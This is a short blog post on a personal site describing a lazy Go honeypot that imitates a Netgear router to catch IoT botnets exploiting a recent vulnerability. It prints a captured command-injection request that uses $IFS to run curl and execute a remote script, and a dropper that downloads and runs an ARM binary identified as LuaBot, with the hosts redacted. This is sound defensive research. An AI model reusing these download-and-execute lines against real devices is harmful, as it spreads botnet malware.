<!doctype html><html lang=en>
<head>
<meta charset=utf-8>
<meta name=viewport content="width=device-width,initial-scale=1">
<meta http-equiv=content-language content="en">
<meta name=color-scheme content="light dark">
<meta http-equiv=content-security-policy content="upgrade-insecure-requests; block-all-mixed-content; default-src 'self'; child-src 'self'; font-src 'self' https://fonts.gstatic.com https://cdn.jsdelivr.net/; form-action 'self'; frame-src 'self'; img-src 'self' https://pizzey.goatcounter.com; object-src 'none'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com/ https://cdn.jsdelivr.net/; script-src 'self' 'unsafe-inline' https://www.google-analytics.com https://gc.zgo.at; prefetch-src 'self'; connect-src 'self' https://www.google-analytics.com;">
<meta name=author content="Sam Pizzey">
<meta name=description content="Recently I decided that I wanted to do a bit more malware analysis. I have a reverse engineering background of sorts, so I wasn’t so concerned with the mechanics of analysing the malware as I was with the question of how do I actually find a sample to analyse that is interesting to me and answers some sort of actual question, rather than purely being a learning exercise?
This happened to be a day or so after the Netgear vulnerability affecting their consumer routers was released to the public and gave me a question to answer - would the IoT botnet authors add support for this vulnerability to their bots?">
<meta name=keywords content="blog,developer,personal">
<meta name=twitter:card content="summary">
<meta name=twitter:title content="Honeypotting for the Lazy: Weekend Fishing for Router Bots">
<meta name=twitter:description content="Recently I decided that I wanted to do a bit more malware analysis. I have a reverse engineering background of sorts, so I wasn’t so concerned with the mechanics of analysing the malware as I was with the question of how do I actually find a sample to analyse that is interesting to me and answers some sort of actual question, rather than purely being a learning exercise?
This happened to be a day or so after the Netgear vulnerability affecting their consumer routers was released to the public and gave me a question to answer - would the IoT botnet authors add support for this vulnerability to their bots?">
<meta property="og:title" content="Honeypotting for the Lazy: Weekend Fishing for Router Bots">
<meta property="og:description" content="Recently I decided that I wanted to do a bit more malware analysis. I have a reverse engineering background of sorts, so I wasn’t so concerned with the mechanics of analysing the malware as I was with the question of how do I actually find a sample to analyse that is interesting to me and answers some sort of actual question, rather than purely being a learning exercise?
This happened to be a day or so after the Netgear vulnerability affecting their consumer routers was released to the public and gave me a question to answer - would the IoT botnet authors add support for this vulnerability to their bots?">
<meta property="og:type" content="article">
<meta property="og:url" content="https://pizzey.me/posts/honeypotting-for-the-lazy-weekend-fishing-for-router-bots/"><meta property="article:section" content="posts">
<meta property="article:published_time" content="2017-01-07T17:05:56+01:00">
<meta property="article:modified_time" content="2017-01-07T17:05:56+01:00">
<title>
Honeypotting for the Lazy: Weekend Fishing for Router Bots · Sam Pizzey
</title>
<link rel=canonical href=https://pizzey.me/posts/honeypotting-for-the-lazy-weekend-fishing-for-router-bots/>
<link rel=preload href="/fonts/forkawesome-webfont.woff2?v=1.2.0" as=font type=font/woff2 crossorigin>
<link rel=stylesheet href=/css/coder.min.34dfa7b2f5cdeb0f5302b2628f4a7a4bfe88a2431e1397ee4ec605c56ab69701.css integrity="sha256-NN+nsvXN6w9TArJij0p6S/6IokMeE5fuTsYFxWq2lwE=" crossorigin=anonymous media=screen>
<link rel=stylesheet href=/css/custom.css>
<link rel=icon type=image/png href=/images/favicon-32x32.png sizes=32x32>
<link rel=icon type=image/png href=/images/favicon-16x16.png sizes=16x16>
<link rel=apple-touch-icon href=/images/apple-touch-icon.png>
<link rel=apple-touch-icon sizes=180x180 href=/images/apple-touch-icon.png>
<meta name=generator content="Hugo 0.89.2">
</head>
<body class="preload-transitions colorscheme-light">
<main class=wrapper>
<nav class=navigation>
<section class=container>
<a class=navigation-title href=/>
Sam Pizzey
</a>
<input type=checkbox id=menu-toggle>
<label class="menu-button float-right" for=menu-toggle>
<i class="fa fa-bars fa-fw" aria-hidden=true></i>
</label>
<ul class=navigation-list>
<li class=navigation-item>
<a class=navigation-link href=/posts/>Blog</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/contact/>Contact</a>
</li>
</ul>
</section>
</nav>
<div class=content>
<section class="container post">
<article>
<header>
<div class=post-title>
<h1 class=title>
<a class=title-link href=https://pizzey.me/posts/honeypotting-for-the-lazy-weekend-fishing-for-router-bots/>
Honeypotting for the Lazy: Weekend Fishing for Router Bots
</a>
</h1>
</div>
<div class=post-meta>
<div class=date>
<span class=posted-on>
<i class="fa fa-calendar" aria-hidden=true></i>
<time datetime=2017-01-07T17:05:56+01:00>
January 7, 2017
</time>
</span>
<span class=reading-time>
<i class="fa fa-clock-o" aria-hidden=true></i>
3-minute read
</span>
</div>
</div>
</header>
<div>
<p>Recently I decided that I wanted to do a bit more malware analysis. I have a reverse engineering background of sorts, so I wasn’t so concerned with the mechanics of analysing the malware as I was with the question of how do I actually find a sample to analyse that is interesting to me and answers some sort of actual question, rather than purely being a learning exercise?</p>
<p>This happened to be a day or so after <a href=https://nakedsecurity.sophos.com/2016/12/12/netgear-routers-have-gaping-remote-access-hole/>the Netgear vulnerability affecting their consumer routers</a> was released to the public and gave me a question to answer - would the IoT botnet authors add support for this vulnerability to their bots?</p>
<p>An important thing to realise about me: I’m incredibly lazy. I didn’t feel like learning to use complicated honeypotting tools or setting up a massive amount of infrastructure, just to answer a throwaway question I had on the weekend. So this presented another question: how could I fish for this malware as lazily as possible?</p>
<p>So with a fine Cornish cider in hand I wrote possibly the crappiest emulation of a router ever. It’s a 21-line Go program that looks like so:</p>
<div class=highlight><pre tabindex=0 style=-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-go data-lang=go><span style=color:green;font-weight:700>package</span> main

<span style=color:green;font-weight:700>import</span> (
    <span style=color:#ba2121>&#34;net/http&#34;</span>
    <span style=color:#ba2121>&#34;log&#34;</span>
)

<span style=color:green;font-weight:700>func</span> <span style=color:#00f>HelloServer</span>(w http.ResponseWriter, req <span style=color:#666>*</span>http.Request) {
    log.<span style=color:#00f>Print</span>(req)
    w.<span style=color:#00f>Header</span>().<span style=color:#00f>Set</span>(<span style=color:#ba2121>&#34;Content-Type&#34;</span>, <span style=color:#ba2121>&#34;text/html&#34;</span>)
    w.<span style=color:#00f>Header</span>()[<span style=color:#ba2121>&#34;WWW-Authenticate&#34;</span>] = []<span style=color:#b00040>string</span>{<span style=color:#ba2121>&#34;Basic realm=\&#34;NETGEAR R7000\&#34;&#34;</span>}
    w.<span style=color:#00f>WriteHeader</span>(<span style=color:#666>401</span>)
}

<span style=color:green;font-weight:700>func</span> <span style=color:#00f>main</span>() {
    http.<span style=color:#00f>HandleFunc</span>(<span style=color:#ba2121>&#34;/&#34;</span>, HelloServer)
    err <span style=color:#666>:=</span> http.<span style=color:#00f>ListenAndServeTLS</span>(<span style=color:#ba2121>&#34;:8443&#34;</span>, <span style=color:#ba2121>&#34;netgear.crt&#34;</span>, <span style=color:#ba2121>&#34;netgear.key&#34;</span>, <span style=color:green;font-weight:700>nil</span>)
    <span style=color:green;font-weight:700>if</span> err <span style=color:#666>!=</span> <span style=color:green;font-weight:700>nil</span> {
        log.<span style=color:#00f>Fatal</span>(<span style=color:#ba2121>&#34;ListenAndServe: &#34;</span>, err)
    }
}
</code></pre></div><p>It listens on port 8443, like the real device, and looks on the surface about as much like the device as I could be bothered to make it look. It’s definitely not perfect! The headers are returned in the wrong order, it returns some headers the real device doesn’t, because Go’s net/http package added them and I was too lazy to work out how to remove them, the SSL certificate is just a self signed one I made with the same fields as the real Netgear certificate, and so on.</p>
<p>But I figured it might be good enough to fool an automated scanner, which is probably just looking for a string somewhere. And I was right!</p>
<p>I deployed this to a DigitalOcean VM that I had lying around, and then, because this device would usually be running on consumer/office ISP’s and not datacentres, had a few kind friends forward incoming traffic to their IP’s on port 8443 to my new VM.</p>
<p>A day or two later, something bit:</p>
<div class=highlight><pre tabindex=0 style=-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback>2016/12/13 12:17:54 &amp;{GET / HTTP/1.1 1 1 map[Connection:[close] User-Agent:[Scanbot]] 0x8762b0 0 [] false REDACTED map[] map[] &lt;nil&gt; map[] REDACTED:52268 / 0xc21006fa80}
2016/12/13 12:17:55 &amp;{GET /cgi-bin/;cd$IFS%22var%22;curl$IFS%22REDACTED:7778%22$IFS%22-o%22$IFS%22nya.sh%22;sh$IFS%22nya.sh%22 HTTP/1.1 1 1 map[Connection:[close] User-Agent:[Scanbot]] 0x8762b0 0 [] false REDACTED map[] map[] &lt;nil&gt; map[] REDACTED:54482 /cgi-bin/;cd$IFS&#34;var&#34;;curl$IFS&#34;REDACTED:7778&#34;$IFS&#34;-o&#34;$IFS&#34;nya.sh&#34;;sh$IFS&#34;nya.sh&#34; 0xc2100af660}
</code></pre></div><p>As you can see, the output is disgusting - because I just dumped Go’s object straight to the log. Lazy, remember.</p>
<p>But, we clearly have evidence here of something hitting us to determine if we are a Netgear and then attempting to exploit the vulnerability. Let’s take a look at the script:</p>
<div class=highlight><pre tabindex=0 style=-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-fallback data-lang=fallback>curl http://REDACTED/arm_lsb &gt; /var/nya
chmod 777 /var/nya
/var/nya
</code></pre></div><p>Yep, looks like some kind of IoT malware to me. And it was - if you’re interested, it turns out to be LuaBot, as described previously <a href=http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html>here</a>.</p>
<p>So, while not exactly a success at finding the worlds next superbug, my little weekend experiment did show that you don’t need to be a big shot researcher with budget and tools to match to go do stuff - just go do stuff. In a really hacky way if you want to, you can still go out and do stuff, even if you aren’t leet or are just really lazy.</p>
</div>
<footer>
</footer>
</article>
</section>
</div>
<footer class=footer>
<section class=container>
©
2014 -
2021
Sam Pizzey
·
Powered by <a href=https://gohugo.io/>Hugo</a> & <a href=https://github.com/luizdepra/hugo-coder/>Coder</a>.
</section>
</footer>
</main>
<script src=/js/coder.min.03b17769f4f91ae35667e1f2a1ca8c16f50562576cf90ff32b3179926914daa5.js integrity="sha256-A7F3afT5GuNWZ+HyocqMFvUFYlds+Q/zKzF5kmkU2qU="></script>
<script data-goatcounter=https://pizzey.goatcounter.com/count async src=//gc.zgo.at/count.js></script>
</body>
</html>